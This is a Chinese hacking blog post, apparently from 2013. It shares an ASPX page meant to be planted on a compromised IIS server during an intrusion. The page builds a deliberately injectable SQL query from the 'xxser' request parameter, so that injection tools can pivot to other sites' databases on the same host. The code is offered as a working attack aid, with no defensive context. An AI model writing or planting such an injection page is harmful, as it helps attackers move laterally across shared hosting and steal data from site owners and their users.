利用aspx构造注射来跨站

feng 2013-03-17 1,553 ℃ 0条点评

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。

其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。

代码量不多，自己写个拉倒了。烦死了。
作者：xxser

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head runat="server">

<title>暗影aspx构造注射专用页面</title>

</head>

<body>

<form id="form1" runat="server">

<div>

<script language="c#" runat="server">

void page_init(object sender, EventArgs e)

{

System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();

conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();

conn.Open();

string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1

System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);

int x = command.ExecuteNonQuery();

Response.Write(i+"\n");

Response.Write(x);

conn.Close();

}

</script>

</div>

</form>

</body>

</html>

本文标签：aspx构造注射

版权信息

永久链接：http://www.afeng.org/677.html
转载请注明转自 » 阿峰博客阿峰'S blog » 利用aspx构造注射来跨站

已有0条评论，欢迎点评！

国际惯例, 沙发拿下 . . .

阿峰博客阿峰'S blog

OpenSSHD用户枚举漏洞

安全浏览网页就用Webfilter

将Firefox打造成渗透测试利器：Firefox Security Toolkit

XYCMS律师事务所建站系统注入漏洞

十二生肖全集在线观看qvod快播种子下载地址

黑客游戏Watch Dogs PC版正式发布下载地址